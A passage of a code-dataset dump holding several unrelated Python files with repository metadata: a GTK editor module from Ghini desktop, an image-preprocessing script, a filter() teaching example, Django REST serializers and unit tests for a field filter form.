wrapped=validator)\n\n if isinstance(widget, Gtk.Entry):\n def on_changed(entry):\n self.set_model_attr(model_attr, entry.props.text, validator)\n self.view.connect(widget, 'changed', on_changed)\n elif isinstance(widget, Gtk.TextView):\n def on_changed(textbuff):\n self.set_model_attr(model_attr, textbuff.props.text, validator)\n buff = widget.get_buffer()\n self.view.connect(buff, 'changed', on_changed)\n elif isinstance(widget, Gtk.ComboBox):\n # this also handles Gtk.ComboBoxEntry since it extends\n # Gtk.ComboBox\n def combo_changed(combo, data=None):\n if not combo.get_active_iter():\n # get here if there is no model on the ComboBoxEntry\n return\n model = combo.get_model()\n if model is None or combo.get_active_iter() is None:\n return\n value = model[combo.get_active_iter()][0]\n value = combo.get_model()[combo.get_active_iter()][0]\n if isinstance(widget, Gtk.ComboBox) and isinstance(widget.get_child(), Gtk.Entry):\n widget.get_child().set_text(utils.utf8(value) or '')\n self.set_model_attr(model_attr, value, validator)\n\n def entry_changed(entry, data=None):\n self.set_model_attr(model_attr, entry.props.text, validator)\n\n self.view.connect(widget, 'changed', combo_changed)\n if isinstance(widget, Gtk.ComboBox) and isinstance(widget.get_child(), Gtk.Entry):\n self.view.connect(widget.get_child(), 'changed', entry_changed)\n elif isinstance(widget, (Gtk.ToggleButton, Gtk.CheckButton,\n Gtk.RadioButton)):\n def toggled(button, data=None):\n active = button.get_active()\n logger.debug('toggled %s: %s' % (widget_name, active))\n button.set_inconsistent(False)\n self.set_model_attr(model_attr, active, validator)\n self.view.connect(widget, 'toggled', toggled)\n else:\n raise ValueError('assign_simple_handler() -- '\n 'widget type not supported: %s' % type(widget))\n\n def assign_completions_handler(self, widget, get_completions,\n on_select=lambda v: v):\n \"\"\"Dynamically handle completions on a Gtk.Entry.\n\n :param widget: a Gtk.Entry instance or widget name\n\n :param get_completions: the callable to invoke when a list of\n completions is requested, accepts the string typed, returns an\n iterable of completions\n\n :param on_select: callback for when a value is selected from\n the list of completions\n\n \"\"\"\n\n logger.debug('assign_completions_handler %s' % widget)\n if isinstance(widget, str):\n widget = self.view.widgets[widget]\n PROBLEM = hash(Gtk.Buildable.get_name(widget))\n\n def add_completions(text):\n if get_completions is None:\n logger.debug(\"completion model has static list\")\n # get_completions is None usually means that the\n # completions model already has a static list of\n # completions\n return\n # get the completions using [0:key_length] as the start of\n # the string\n\n def idle_callback(values):\n completion = widget.get_completion()\n utils.clear_model(completion)\n completion_model = Gtk.ListStore(object)\n for v in values:\n completion_model.append([v])\n completion.set_model(completion_model)\n\n key_length = widget.get_completion().props.minimum_key_length\n values = get_completions(text[:key_length])\n logger.debug('completions to add: %s' % str([i for i in values]))\n GObject.idle_add(idle_callback, values)\n\n def on_changed(entry, *args):\n logger.debug('assign_completions_handler::on_changed %s %s'\n % (entry, args))\n text = entry.get_text()\n\n key_length = widget.get_completion().props.minimum_key_length\n if len(text) > key_length:\n logger.debug('recomputing completions matching %s' % text)\n add_completions(text)\n\n def idle_callback(text):\n logger.debug('on_changed - part two')\n comp = entry.get_completion()\n comp_model = comp.get_model()\n found = []\n if comp_model:\n comp_model.foreach(lambda m, p, i, ud: logger.debug(\"item(%s) of comp_model: %s\" % (p, m[p][0])), None)\n # search the tree model to see if the text in the\n # entry matches one of the completions, if so then\n # emit the match-selected signal, this allows us to\n # type a match in the entry without having to select\n # it from the popup\n def _cmp(row, data):\n return utils.utf8(row[0])[:len(text)].lower() == data.lower()\n found = utils.search_tree_model(comp_model, text, _cmp)\n logger.debug(\"matches found in ListStore: %s\" % str(found))\n if not found:\n logger.debug('nothing found, nothing to select from')\n elif len(found) == 1:\n logger.debug('one match, decide whether to select it - %s' % found[0])\n v = comp.get_model()[found[0]][0]\n # only auto select if the full string has been entered\n if text.lower() == utils.utf8(v).lower():\n comp.emit('match-selected', comp.get_model(), found[0])\n else:\n found = None\n else:\n logger.debug('multiple matches, we cannot select any - %s' % str(found))\n\n if text != '' and not found and PROBLEM not in self.problems:\n self.add_problem(PROBLEM, widget)\n on_select(None)\n\n # if entry is empty select nothing and remove all problem\n if text == '':\n on_select(None)\n self.remove_problem(PROBLEM, widget)\n elif not comp_model:\n ## completion model is not in place when object is forced\n ## programmatically.\n on_select(text) # `on_select` will know how to convert the\n # text into a properly typed value.\n self.remove_problem(PROBLEM, widget)\n logger.debug('on_changed - part two - returning')\n\n GObject.idle_add(idle_callback, text)\n logger.debug('on_changed - part one - returning')\n return True\n\n def on_match_select(completion, compl_model, treeiter):\n value = compl_model[treeiter][0]\n # temporarily block the changed ID so that this function\n # doesn't get called twice\n widget.handler_block(_changed_sid)\n widget.props.text = utils.utf8(value)\n widget.handler_unblock(_changed_sid)\n self.remove_problem(PROBLEM, widget)\n on_select(value)\n return True # return True or on_changed() will be called with ''\n\n completion = widget.get_completion()\n check(completion is not None, 'the Gtk.Entry %s doesn\\'t have a '\n 'completion attached to it' % Gtk.Buildable.get_name(widget))\n\n _changed_sid = self.view.connect(widget, 'changed', on_changed)\n self.view.connect(completion, 'match-selected', on_match_select)\n\n def start(self):\n \"\"\"run the dialog associated to the view\n\n \"\"\"\n result = self.view.get_window().run()\n if (self.is_committing_presenter\n and result in self.committing_results\n and self._dirty):\n self.commit_changes()\n self.cleanup()\n return result\n\n def cleanup(self):\n \"\"\"\n Revert any changes the presenter might have done to the\n widgets so that next time the same widgets are open everything\n will be normal.\n\n By default it only calls self.view.cleanup()\n \"\"\"\n self.clear_problems()\n if isinstance(self.view, GenericEditorView):\n self.view.cleanup()\n\n\nclass ChildPresenter(GenericEditorPresenter):\n \"\"\"\n This Presenter acts as a proxy to another presenter that shares\n the same view. This avoids circular references by not having a\n presenter within a presenter that both hold references to the\n view.\n\n This Presenter keeps a weakref to the parent presenter and\n provides a pass through to the parent presenter for calling\n methods that reference the view.\n \"\"\"\n\n def __init__(self, model, view):\n super().__init__(model, view)\n #self._view_ref = weakref.ref(view)\n\n def _get_view(self):\n return self._view_ref()\n\n def _set_view(self, view):\n if isinstance(view, GenericEditorView):\n self._view_ref = weakref.ref(view)\n else:\n raise ValueError('view must be an instance of GenericEditorView')\n\n view = property(_get_view, _set_view)\n\n\nclass GenericModelViewPresenterEditor(object):\n '''\n GenericModelViewPresenterEditor assume that model is an instance\n of object mapped to a SQLAlchemy table\n\n The editor creates its own session and merges the model into\n it. If the model is already in another session that original\n session will not be effected.\n\n When creating a subclass of this editor then you should explicitly\n close the session when you are finished with it.\n\n :param model: an instance of an object mapped to a SQLAlchemy\n Table, the model will be copied and merged into self.session so\n that the original model will not be changed\n\n :param parent: the parent windows for the view or None\n '''\n ok_responses = ()\n\n def __init__(self, model, parent=None):\n self.session = db.Session()\n self.model = self.session.merge(model)\n\n def commit_changes(self):\n '''\n Commit the changes to self.session()\n '''\n objs = list(self.session)\n try:\n self.session.commit()\n try:\n bauble.gui.get_view().update()\n except Exception as e:\n pass\n except Exception as e:\n logger.warning(\"can't commit changes: (%s) %s\" % (type(e), e))\n self.session.rollback()\n self.session.add_all(objs)\n raise\n return True\n\n def __del__(self):\n if hasattr(self, 'session'):\n # in case one of the check()'s fail in __init__\n self.session.commit()\n self.session.close()\n\n\nclass NoteBox(Gtk.HBox):\n glade_ui = 'notes.glade'\n\n def set_content(self, text):\n buff = Gtk.TextBuffer()\n self.widgets.note_textview.set_buffer(buff)\n utils.set_widget_value(self.widgets.note_textview,\n text or '')\n if not text:\n self.presenter.add_problem(self.presenter.PROBLEM_EMPTY, self.widgets.note_textview)\n buff.connect('changed', self.on_note_buffer_changed, self.widgets.note_textview)\n\n def __init__(self, presenter, model=None):\n super().__init__()\n\n # open the glade file and extract the markup that the\n # expander will use\n filename = os.path.join(paths.lib_dir(), self.glade_ui)\n xml = etree.parse(filename)\n el = xml.find(\"//object[@id='notes_box']\")\n builder = Gtk.Builder()\n s = '%s' % etree.tostring(el)\n if sys.platform == 'win32':\n # NOTE: PyGTK for Win32 is broken so we have to include\n # this little hack\n #\n # TODO: is this only a specific set of version of\n # PyGTK/GTK...it was only tested with PyGTK 2.12\n builder.add_from_string(s, -1)\n else:\n builder.add_from_string(s)\n self.widgets = utils.BuilderWidgets(builder)\n\n notes_box = self.widgets.notes_box\n self.widgets.remove_parent(notes_box)\n self.pack_start(notes_box, True, True, 0)\n\n self.session = object_session(presenter.model)\n self.presenter = presenter\n if model:\n self.model = model\n else:\n self.model = presenter.note_cls()\n\n self.widgets.notes_expander.props.use_markup = True\n self.widgets.notes_expander.props.label = ''\n self.widgets.notes_expander.props.label_widget.\\\n ellipsize = Pango.EllipsizeMode.END\n\n # set the model values on the widgets\n mapper = object_mapper(self.model)\n values = utils.get_distinct_values(mapper.c['category'],\n self.session)\n utils.setup_text_combobox(self.widgets.category_comboentry, values)\n utils.set_widget_value(self.widgets.category_comboentry,\n self.model.category or '')\n utils.setup_date_button(None, self.widgets.date_entry,\n self.widgets.date_button)\n date_str = utils.today_str()\n if self.model.date:\n format = prefs.prefs[prefs.date_format_pref]\n date_str = self.model.date.strftime(format)\n utils.set_widget_value(self.widgets.date_entry, date_str)\n utils.set_widget_value(self.widgets.user_entry,\n self.model.user or '')\n self.set_content(self.model.note)\n\n # connect the signal handlers\n self.widgets.date_entry.connect(\n 'changed', self.on_date_entry_changed)\n self.widgets.user_entry.connect(\n 'changed', self.on_user_entry_changed)\n # connect category comboentry widget and child entry\n self.widgets.category_comboentry.connect(\n 'changed', self.on_category_combo_changed)\n self.widgets.category_comboentry.get_child().connect(\n 'changed', self.on_category_entry_changed)\n self.widgets.notes_remove_button.connect(\n 'clicked', self.on_notes_remove_button)\n\n self.update_label()\n self.show_all()\n\n def set_expanded(self, expand):\n self.widgets.notes_expander.props.expanded = expand\n\n def on_notes_remove_button(self, button, *args):\n \"\"\"\n \"\"\"\n if self.model in self.presenter.notes:\n self.presenter.notes.remove(self.model)\n self.widgets.remove_parent(self.widgets.notes_box)\n self.presenter._dirty = True\n self.presenter.parent_ref().refresh_sensitivity()\n\n def on_date_entry_changed(self, entry, *args):\n PROBLEM = 'BAD_DATE'\n text = entry.props.text\n try:\n text = DateValidator().to_python(text)\n except Exception as e:\n logger.debug(e)\n self.presenter.add_problem(PROBLEM, entry)\n else:\n self.presenter.remove_problem(PROBLEM, entry)\n self.set_model_attr('date', text)\n\n def on_user_entry_changed(self, entry, *args):\n value = utils.utf8(entry.props.text)\n if not value: # if value == ''\n value = None\n self.set_model_attr('user', value)\n\n def on_category_combo_changed(self, combo, *args):\n \"\"\"\n Sets the text on the entry. The model value is set in the\n entry \"changed\" handler.\n \"\"\"\n text = ''\n treeiter = combo.get_active_iter()\n if treeiter:\n text = utils.utf8(combo.get_model()[treeiter][0])\n else:\n return\n self.widgets.category_comboentry.get_child().props.text = \\\n utils.utf8(text)\n\n def on_category_entry_changed(self, entry, *args):\n \"\"\"\n \"\"\"\n value = utils.utf8(entry.props.text)\n if not value: # if value == ''\n value = None\n self.set_model_attr('category', value)\n\n def on_note_buffer_changed(self, buff, widget, *args):\n value = utils.utf8(buff.props.text)\n if not value: # if value == ''\n value = None\n self.presenter.add_problem(self.presenter.PROBLEM_EMPTY, widget)\n else:\n self.presenter.remove_problem(self.presenter.PROBLEM_EMPTY, widget)\n self.set_model_attr('note', value)\n\n def update_label(self):\n label = []\n date_str = None\n if self.model.date and isinstance(self.model.date, datetime.date):\n format = prefs.prefs[prefs.date_format_pref]\n date_str = utils.xml_safe(\n self.model.date.strftime(format))\n elif self.model.date:\n date_str = utils.xml_safe(self.model.date)\n else:\n date_str = self.widgets.date_entry.props.text\n\n if self.model.user and date_str: # and self.model.date:\n label.append(_('%(user)s on %(date)s') %\n dict(user=utils.xml_safe(self.model.user),\n date=date_str))\n elif date_str:\n label.append('%s' % date_str)\n elif self.model.user:\n label.append('%s' % utils.xml_safe(self.model.user))\n\n if self.model.category:\n label.append('(%s)' % utils.xml_safe(self.model.category))\n\n if self.model.note:\n note_str = ' : %s' % utils.xml_safe(self.model.note).\\\n replace('\\n', ' ')\n max_length = 25\n # label.props.ellipsize doesn't work properly on a\n # label in an expander we just do it ourselves here\n if len(self.model.note) > max_length:\n label.append('%s …' % note_str[0:max_length-1])\n else:\n label.append(note_str)\n\n self.widgets.notes_expander.set_label(' '.join(label))\n\n def set_model_attr(self, attr, value):\n setattr(self.model, attr, value)\n self.presenter._dirty = True\n if attr != 'date' and not self.model.date:\n # this is a little voodoo to set the date on the model\n # since when we create a new note box we add today's\n # date to the entry but we don't set the model so the\n # presenter doesn't appear dirty...we have to use a\n # tmp variable since the changed signal won't fire if\n # the new value is the same as the old\n entry = self.widgets.date_entry\n tmp = entry.props.text\n entry.props.text = ''\n entry.props.text = tmp\n # if the note is new and isn't yet associated with an\n # accession then set the accession when we start\n # changing values, this way we can setup a dummy\n # verification in the interface\n self.presenter.notes.append(self.model)\n\n self.update_label()\n\n self.presenter.parent_ref().refresh_sensitivity()\n\n @classmethod\n def is_valid_note(cls, note):\n return True\n\n\nclass PictureBox(NoteBox):\n glade_ui = 'pictures.glade'\n last_folder = '.'\n\n def __init__(self, presenter, model=None):\n super().__init__(presenter, model)\n utils.set_widget_value(self.widgets.category_comboentry,\n '')\n self.presenter._dirty = False\n\n self.widgets.picture_button.connect(\n \"clicked\", self.on_activate_browse_button)\n\n def set_content(self, basename):\n for w in list(self.widgets.picture_button.get_children()):\n w.destroy()\n if basename is not None:\n im = Gtk.Image()\n try:\n thumbname = os.path.join(\n prefs.prefs[prefs.picture_root_pref], 'thumbs', basename)\n filename = os.path.join(\n prefs.prefs[prefs.picture_root_pref], basename)\n if os.path.isfile(thumbname):\n pixbuf = GdkPixbuf.Pixbuf.new_from_file(thumbname)\n else:\n fullbuf = GdkPixbuf.Pixbuf.new_from_file(filename)\n fullbuf = fullbuf.apply_embedded_orientation()\n scale_x = fullbuf.get_width() / 400.0\n scale_y = fullbuf.get_height() / 400.0\n scale = max(scale_x, scale_y, 1)\n x = int(fullbuf.get_width() / scale)\n y = int(fullbuf.get_height() / scale)\n pixbuf = fullbuf.scale_simple(\n x, y, GdkPixbuf.InterpType.BILINEAR)\n im.set_from_pixbuf(pixbuf)\n except GLib.GError as e:\n logger.debug(\"picture %s caused GLib.GError %s\" %\n (basename, e))\n label = _('picture file %s not found.') % basename\n im = Gtk.Label()\n im.set_text(label)\n except Exception as e:\n logger.warning(\"can't commit changes: (%s) %s\" % (type(e), e))\n im = Gtk.Label()\n im.set_text(e)\n else:\n # make button hold some text\n im = Gtk.Label()\n im.set_text(_('Choose a file…'))\n im.show()\n self.widgets.picture_button.add(im)\n self.widgets.picture_button.show()\n\n def on_activate_browse_button(self, widget, data=None):\n fileChooserDialog = Gtk.FileChooserDialog(\n _(\"Choose a file…\"), None,\n buttons=(Gtk.STOCK_OK, Gtk.ResponseType.ACCEPT,\n Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL))\n try:\n logger.debug('about to set current folder - %s' % self.last_folder)\n fileChooserDialog.set_current_folder(self.last_folder)\n fileChooserDialog.run()\n filename = fileChooserDialog.get_filename()\n if filename:\n ## remember chosen location for next time\n PictureBox.last_folder, basename = os.path.split(str(filename))\n logger.debug('new current folder is: %s' % self.last_folder)\n ## copy file to picture_root_dir (if not yet there),\n ## also receiving thumbnail base64\n thumb = utils.copy_picture_with_thumbnail(self.last_folder, basename)\n ## make sure the category is \n self.set_model_attr('category', '')\n ## append thumbnail base64 to content string\n basename = basename + \"|data:image/jpeg;base64,\" + thumb\n ## store basename in note field and fire callbacks.\n self.set_model_attr('note', basename)\n self.set_content(basename)\n except Exception as e:\n logger.warning(\"unhandled exception in editor.py: \"\n \"(%s)%s\" % (type(e), e))\n fileChooserDialog.destroy()\n\n def on_category_entry_changed(self, entry, *args):\n pass\n\n @classmethod\n def is_valid_note(cls, note):\n return note.category == ''\n\n\n# TODO: create a separate class for browsing notes in a treeview\n# structure\n\n# TODO: add an \"editable\" property to the NotesPresenter and if it is\n# True then show the add/remove buttons\n\nclass NotesPresenter(GenericEditorPresenter):\n \"\"\"\n The NotesPresenter provides a generic presenter for editor notes\n on an item in the database. This presenter requires that the\n notes property provide a specific interface.\n\n :param presenter: the parent presenter of this presenter\n :param notes_property: the string name of the notes property of\n the presenter.model\n :param parent_container: the Gtk.Container to add the notes editor box to\n \"\"\"\n\n ContentBox = NoteBox\n\n def __init__(self, presenter, notes_property, parent_container):\n super().__init__(presenter.model, None)\n\n # The glade file named in ContentBox is structured with two top\n # GtkWindow next to each other. Here, by not doing any lookup, we\n # get the first one, from which we extract the 'notes_editor_box'\n # child. This is expected to contain a 'notes_expander_box' vertical\n # box, which will host all expanders. In the content box we\n # extract, from the same file, the widget named 'notes_box'.\n filename = os.path.join(paths.lib_dir(), self.ContentBox.glade_ui)\n self.widgets = utils.BuilderWidgets(filename)\n\n self.parent_ref = weakref.ref(presenter)\n self.note_cls = object_mapper(presenter.model).\\\n get_property(notes_property).mapper.class_\n self.notes = getattr(presenter.model, notes_property)\n self.parent_container = parent_container\n editor_box = self.widgets.notes_editor_box # Gtk.VBox()\n self.widgets.remove_parent(editor_box)\n parent_container.add(editor_box)\n\n # the `expander`s are added to self.box\n self.box = self.widgets.notes_expander_box\n\n valid_notes_count = 0\n for note in self.notes:\n if self.ContentBox.is_valid_note(note):\n box = self.add_note(note)\n box.set_expanded(False)\n valid_notes_count += 1\n\n logger.debug('notes: %s' % self.notes)\n logger.debug('children: %s' % self.box.get_children())\n\n self.widgets.notes_add_button.connect(\n 'clicked', self.on_add_button_clicked)\n self.box.show_all()\n\n def on_add_button_clicked(self, *args):\n box = self.add_note()\n box.set_expanded(True)\n\n def add_note(self, note=None):\n \"\"\"\n Add a new note to the model.\n \"\"\"\n expander = self.ContentBox(self, note)\n self.box.pack_start(expander, False, False, 0)\n self.box.reorder_child(expander, 0)\n expander.show_all()\n return expander\n\n\nclass PicturesPresenter(NotesPresenter):\n \"\"\"pictures are associated to notes of category .\n\n you add a picture and you see a picture but the database will just hold\n the name of the corresponding file.\n\n as for other presenters, you can expand/collapse each inserted\n picture, you add or remove pictures, you see them on screen.\n\n this class works just the same as the NotesPresenter, with the\n note_textview replaced by a Button containing an Image.\n \"\"\"\n\n ContentBox = PictureBox\n\n def __init__(self, presenter, notes_property, parent_container):\n super().__init__(\n presenter, notes_property, parent_container)\n\n notes = self.box.get_children()\n if notes:\n notes[0].set_expanded(False) # expand none\n","repo_name":"Ghini/ghini.desktop","sub_path":"bauble/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":83614,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"23726346889","text":"from PIL import Image\nfrom libtiff import TIFF\nimport numpy as np\nimport glob\nimport sys\nimport cv2\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nimport math\nfrom scipy.stats import mode\n\ndef preprocess_file(filename):\n print(filename)\n #processed_data = pd.read_csv(filename).groupby('plate').apply(aggr)\n try:\n img = Image.open(filename)\n #img = cv2.imread(filename)\n #img = TIFF.open(filename)\n #b,g,r = Image.Image.split(img)\n #imarray = [np.array(r),np.array(g),np.array(b)]\n imarray = np.array(img)\n #imarray = img.read_image()\n return imarray\n except:\n print(\"Bad file!\")\n return 1\n\nlabels_file = pd.read_csv(\"_labels.csv\")\n\npath = \"test_data\"#\"training_data/Final_project\"#\"test_images\"\nfilenames = glob.glob(path + \"/*.tif\")\nbad_files_count = 0\ngood_files_count = 0\nfor filename in filenames:\n id_name = filename[:-4][10:]\n #id_name = filename[:-4][12:]\n print(id_name)\n new_name = \"preprocessed_test_data/prep_data_\" + id_name + \".pickle\"\n print(new_name)\n #print(filename[:-4][12:])\n data = preprocess_file(filename)\n\n if type(data) is int:\n bad_files_count = bad_files_count + 1\n else:\n good_files_count = good_files_count + 1\n #print(labels_file.loc[labels_file[\"id\"]==id_name])\n label = labels_file.loc[labels_file[\"id\"]==id_name]['label'].item()\n preprocessed_data = [data, label]\n print(data.shape)\n\n with open(new_name, 'wb') as f:\n pickle.dump(preprocessed_data, f)\nprint(bad_files_count)\nprint(good_files_count)","repo_name":"aschuliger/classifying_and_localizing_metastatic_tumor_cells_with_deep_learning","sub_path":"image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"948392598","text":"# 데이터 분석 활용\n# books.csv 파일을 읽어서 페이지 수가 250이 넘는 책들의 제목을 리스트로 리턴하는\n# get_titles_of_long_books() 함수를 완성하시오.\n\nimport csv\n\ndef get_titles_of_long_books(books):\n with open(books) as file:\n reader = csv.reader(file, delimiter=',')\n\n is_long = lambda row: int(row[3]) > 250\n get_title = lambda row: row[0]\n \n long_books = list(filter(is_long, reader))\n \n long_books_titles = map(get_title, long_books)\n\n return list(long_books_titles)\n\n\n\nbooks = './data/18_books.csv'\ntitles = get_titles_of_long_books(books)\nfor title in titles:\n print(title)\n\n# 리스트에 함수 적용하기\n# filter()는 주어진 데이터 구조에서 특정 조건을 만족하는 원소만 골라내는 파이선의 기본 함수이다.\n\n\n","repo_name":"srang03/dataAnalysis_low","sub_path":"data_practice/23_filter_func.py","file_name":"23_filter_func.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15081908149","text":"from asyncio.windows_events import NULL\nfrom pickle import TRUE\nfrom numpy import source\nfrom user.models import Profile\nfrom .models import poster, Comment, Image, Like\nfrom .models import Story, StoryViewer\nfrom rest_framework import serializers \n#tip : 이미지 필드 serializers에서 사용하기\n#필드명 = serializers.ImageField(use_url=True)\n \nclass commentSeralizer(serializers.ModelSerializer):\n class Meta:\n managed=True \n model = Comment\n db_table = 'Comments'\n fields = ['commentId','posterId','writer','writerImage','uploadTime','body']\n \n #다른 모델 접근을 위해서 create 직접 조작 \n def create(self,validated_data):\n posterId = validated_data.get(\"posterId\")\n writer = validated_data.get(\"writer\")\n body = validated_data.get(\"body\")\n writerImage = writer.userImage\n\n viewer_create = Comment.objects.create(posterId =posterId\n ,writer=writer\n ,writerImage=writerImage\n ,body =body) \n return viewer_create \n \nclass imageSeralizer(serializers.ModelSerializer):\n class Meta:\n managed=True \n model = Image\n db_table = 'Images'\n fields = \"__all__\"\n\nclass likeSeralizer(serializers.ModelSerializer):\n #forgin 키 = liker = profile을 가리침 \n # likerImage = serializers.ImageField(source='liker.userImage')\n\n class Meta:\n managed=True \n model = Like\n db_table = 'Likes'\n fields = ['likeId','posterId','liker','likerImage','uploadTime'] \n \n #다른 모델 접근을 위해서 create 직접 조작 \n def create(self,validated_data):\n posterId = validated_data.get(\"posterId\")\n liker = validated_data.get(\"liker\")\n likerImage = liker.userImage\n\n viewer_create = Like.objects.create(posterId =posterId\n ,liker=liker\n ,likerImage=likerImage) \n return viewer_create \n \n \nclass posterSeralizer(serializers.ModelSerializer):\n commentPost = commentSeralizer(many = True,read_only=True)\n imagePost = imageSeralizer(many = True,read_only=True)\n likePost = likeSeralizer(many=True,read_only=True)\n # tip : 해당 유저 이름을 찾아줌 \n # def validated_username(self, data):\n # return data\n # ##################\n \n #갯수 카운터를 위한 필드\n commentCount = serializers.ReadOnlyField( source='commentPost.count')\n likeCount = serializers.ReadOnlyField( source='likePost.count')\n imageCount = serializers.ReadOnlyField( source='imagePost.count')\n \n class Meta:\n managed=True \n model = poster\n db_table = 'posters'\n fields = ['posterId','username','body',\n 'commentPost','imagePost','likePost','uploadTime',\n 'commentCount','likeCount','imageCount']\n \n #한번에 이미지 데이터 여러개 받는 방법\n def create(self, validated_data):\n images_data = self.context['request'].FILES \n \n poster_create = poster.objects.create(**validated_data)\n for image_data in images_data.getlist('Oneimage'):\n Image.objects.create(posterId=poster_create,Oneimage=image_data)\n return poster_create\n \nclass storyViewerSeralizer(serializers.ModelSerializer):\n class Meta:\n managed=True \n model = StoryViewer\n db_table = 'StoryViewers'\n fields = ['storyId','viewer','viewerImage']\n \n #다른 모델 접근을 위해서 create 직접 조작 \n def create(self,validated_data):\n storyId = validated_data.get(\"storyId\")\n viewer = validated_data.get(\"viewer\")\n viewerImage = viewer.userImage\n\n viewer_create = StoryViewer.objects.create(storyId =storyId\n ,viewerImage=viewerImage) \n return viewer_create\n \n\n \nclass storySeralizer(serializers.ModelSerializer):\n storyViewerPost = storyViewerSeralizer(many=True,read_only=True)\n class Meta:\n managed=True \n model = Story\n db_table = 'Storys'\n fields = ['storyId','username','storyImage','uploadTime','storyViewerPost']\n","repo_name":"jinuemong/DRF-Server-Jinustagram","sub_path":"jinustagram/posting/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25672282197","text":"# coding=utf-8\n\n\"\"\"Field filter form tests.\"\"\"\n\nfrom collections import OrderedDict\nfrom unittest import TestCase\nfrom unittest.mock import Mock, patch\n\nimport pytest\nfrom django.db import models\n\nfrom model_filters.constants import OR_SEPARATOR\nfrom model_filters.forms.field_filter import FieldFilterForm\n\n\n@pytest.mark.unit\nclass Tests(TestCase):\n \"\"\"Field filter form tests.\"\"\"\n\n def test_init(self):\n \"\"\"Field filter form should be initialized properly with no args.\"\"\"\n form = FieldFilterForm()\n self.assertIsNone(form.model)\n self.assertEqual({}, form.field_operators)\n self.assertEqual({}, form.field_values)\n self.assertEqual(\n FieldFilterForm.EXTRA_FIELD_CHOICES, form.fields[\"field\"].choices\n )\n\n def test_init_args(self):\n \"\"\"Field filter form should be initialized properly with args.\"\"\"\n model = Mock()\n field_choices = OrderedDict({\"test\": \"Test\"})\n field_operators = {\"field\": [{\"exact\": \"Exact\"}]}\n field_values = {\"field\": [{\"name\": \"value\"}]}\n form = FieldFilterForm(\n model=model,\n field_choices=field_choices,\n field_operators=field_operators,\n field_values=field_values,\n )\n self.assertEqual(model, form.model)\n self.assertEqual(\n list(field_choices.items()) + FieldFilterForm.EXTRA_FIELD_CHOICES,\n form.fields[\"field\"].choices,\n )\n self.assertEqual(field_operators, form.field_operators)\n self.assertEqual(field_values, form.field_values)\n\n @patch(\"model_filters.forms.field_filter.FieldFilterForm._clean_value\")\n @patch(\"model_filters.forms.field_filter.FieldFilterForm._clean_operator\")\n def test_clean(self, mock_operator, mock_value):\n \"\"\"Field filter values should be valid.\"\"\"\n mock_operator.return_value = \"cleaned operator\"\n mock_value.return_value = \"cleaned value\"\n form = FieldFilterForm()\n form.cleaned_data = {}\n form._errors = {}\n cleaned_data = form.clean()\n self.assertTrue(mock_operator.called)\n self.assertEqual(cleaned_data[\"operator\"], \"cleaned operator\")\n self.assertTrue(mock_value.called)\n self.assertEqual(cleaned_data[\"value\"], \"cleaned value\")\n\n @patch(\"model_filters.forms.field_filter.get_fields_from_path\")\n def test_clean_value(self, mock_get_field):\n \"\"\"Field filter should have valid value field.\"\"\"\n mock_get_field.return_value = [Mock(to_python=Mock())]\n form = FieldFilterForm()\n self.assertIsNone(form._clean_value({}))\n self.assertIsNone(form._clean_value({\"field\": \"\"}))\n self.assertIsNone(form._clean_value({\"field\": \"name\"}))\n self.assertIsNone(form._clean_value({\"field\": \"name\", \"operator\": \"\"}))\n self.assertIsNone(form._clean_value({\"field\": \"name\", \"operator\": \"exact\"}))\n self.assertEqual(\n \"Road Runner\",\n form._clean_value(\n {\"field\": \"name\", \"operator\": \"exact\", \"value\": \"Road Runner\"}\n ),\n )\n\n def test_clean_value_no_value(self):\n \"\"\"Field filter should have valid value field for OR separator.\"\"\"\n form = FieldFilterForm()\n form._errors = {\"value\": \"no bueno\"}\n self.assertEqual(\n \"\",\n form._clean_value(\n {\"field\": \"explosive\", \"operator\": OR_SEPARATOR, \"value\": \"junk\"}\n ),\n )\n self.assertFalse(form.fields[\"value\"].required)\n self.assertEqual({}, form._errors)\n\n form = FieldFilterForm()\n form._errors = {\"value\": \"no bueno\"}\n self.assertEqual(\n \"\",\n form._clean_value(\n {\"field\": OR_SEPARATOR, \"operator\": \"exact\", \"value\": \"junk\"}\n ),\n )\n self.assertFalse(form.fields[\"value\"].required)\n self.assertEqual({}, form._errors)\n\n form = FieldFilterForm()\n form._errors = {\"value\": \"no bueno\"}\n self.assertEqual(\n \"\", form._clean_value({\"field\": \"explosive\", \"operator\": \"istrue\"})\n )\n self.assertEqual({}, form._errors)\n\n @patch(\"model_filters.forms.field_filter.get_fields_from_path\")\n def test_clean_value_bad_int_value(self, mock_get_field):\n \"\"\"Field filter should validate bad value types.\"\"\"\n mock_get_field.return_value = [models.IntegerField()]\n form = FieldFilterForm()\n form.cleaned_data = {}\n self.assertEqual(\n \"Road Runner\",\n form._clean_value(\n {\"field\": \"age\", \"operator\": \"exact\", \"value\": \"Road Runner\"}\n ),\n )\n try:\n self.assertEqual(\n form.errors[\"value\"],\n [\n \"Value is not valid for field (IntegerField): \"\n \"“Road Runner” value must be an integer.\"\n ],\n )\n except AssertionError:\n self.assertEqual(\n form.errors[\"value\"],\n [\n \"Value is not valid for field (IntegerField): \"\n \"'Road Runner' value must be an integer.\"\n ],\n )\n\n @patch(\"model_filters.forms.field_filter.get_fields_from_path\")\n def test_clean_value_exception(self, mock_get_field):\n \"\"\"Field filter should handle exceptions from bad value types.\"\"\"\n mock_get_field.return_value = [\n Mock(\n to_python=Mock(side_effect=ValueError(\"Bad value!\")),\n get_internal_type=Mock(return_value=\"MockField\"),\n )\n ]\n\n form = FieldFilterForm()\n form.cleaned_data = {}\n self.assertEqual(\n \"Road Runner\",\n form._clean_value(\n {\"field\": \"age\", \"operator\": \"exact\", \"value\": \"Road Runner\"}\n ),\n )\n self.assertEqual(\n form.errors[\"value\"],\n [\"Value is not valid for field (MockField): Bad 